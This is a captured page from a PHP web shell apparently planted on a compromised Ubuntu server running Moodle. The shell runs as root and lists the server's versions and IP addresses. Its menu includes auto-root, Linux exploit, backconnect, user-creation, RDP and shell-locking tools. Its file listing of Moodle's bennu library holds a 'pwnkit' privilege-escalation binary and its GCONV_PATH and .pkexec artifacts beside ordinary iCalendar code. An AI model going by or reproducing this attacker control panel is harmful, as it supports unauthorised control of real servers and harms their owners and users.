Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
bennu /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.txt
24
B
-rwxrwxrwx
COPYRIGHT.txt
929
B
-rwxrwxrwx
LICENSE.txt
25.81
KB
-rwxrwxrwx
README.txt
5.77
KB
-rwxrwxrwx
TODO.txt
76
B
-rwxrwxrwx
bennu.class.php
1.75
KB
-rwxrwxrwx
bennu.inc.php
638
B
-rwxrwxrwx
iCalendar_components.php
26.7
KB
-rwxrwxrwx
iCalendar_parameters.php
10.3
KB
-rwxrwxrwx
iCalendar_properties.php
41.1
KB
-rwxrwxrwx
iCalendar_rfc2445.php
24.86
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.51
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bennu.class.php
<?php /** * BENNU - PHP iCalendar library * (c) 2005-2006 Ioannis Papaioannou (pj@moodle.org). All rights reserved. * * Released under the LGPL. * * See http://bennu.sourceforge.net/ for more information and downloads. * * @author Ioannis Papaioannou * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ class Bennu { static function timestamp_to_datetime($t = NULL) { if($t === NULL) { $t = time(); } return gmstrftime('%Y%m%dT%H%M%SZ', $t); } static function timestamp_to_date($t = NULL) { if ($t === NULL) { $t = time(); } return gmstrftime('%Y%m%d', $t); } static function generate_guid() { // Implemented as per the Network Working Group draft on UUIDs and GUIDs // These two octets get special treatment $time_hi_and_version = sprintf('%02x', (1 << 6) + mt_rand(0, 15)); // 0100 plus 4 random bits $clock_seq_hi_and_reserved = sprintf('%02x', (1 << 7) + mt_rand(0, 63)); // 10 plus 6 random bits // Need another 14 random octects $pool = ''; for($i = 0; $i < 7; ++$i) { $pool .= sprintf('%04x', mt_rand(0, 65535)); } // time_low = 4 octets $random = substr($pool, 0, 8).'-'; // time_mid = 2 octets $random .= substr($pool, 8, 4).'-'; // time_high_and_version = 2 octets $random .= $time_hi_and_version.substr($pool, 12, 2).'-'; // clock_seq_high_and_reserved = 1 octet $random .= $clock_seq_hi_and_reserved; // clock_seq_low = 1 octet $random .= substr($pool, 13, 2).'-'; // node = 6 octets $random .= substr($pool, 14, 12); return $random; } }
Close